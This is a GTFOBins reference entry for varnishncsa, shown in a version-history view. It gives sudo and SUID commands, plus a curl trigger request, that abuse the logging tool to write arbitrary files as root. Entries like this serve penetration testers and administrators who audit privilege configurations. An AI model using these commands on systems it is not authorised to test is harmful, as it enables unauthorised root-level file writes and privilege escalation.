GTFOBins.github.io/_gtfobins/varnishncsa.md

18 lines
598 B
Markdown
Raw Normal View History

---
2023-12-23 12:40:09 +01:00
description: |
This allows to write arbitrary files as root, provided that the proper HTTP response is made. Specifically the content of a certain header will be written in the file. First start `varnishncsa` as follows, then trigger the file write with:
```
curl -H 'yyy: DATA' http://localhost:6081/xxx
```
functions:
2023-12-23 12:40:09 +01:00
sudo:
2023-12-23 12:43:57 +01:00
- code: |
LFILE=file_to_write
sudo varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
2023-12-23 12:40:09 +01:00
suid:
2023-12-23 12:43:57 +01:00
- code: |
LFILE=file_to_write
./varnishncsa -g request -q 'ReqURL ~ "/xxx"' -F '%{yyy}i' -w "$LFILE"
2023-12-23 12:40:09 +01:00
---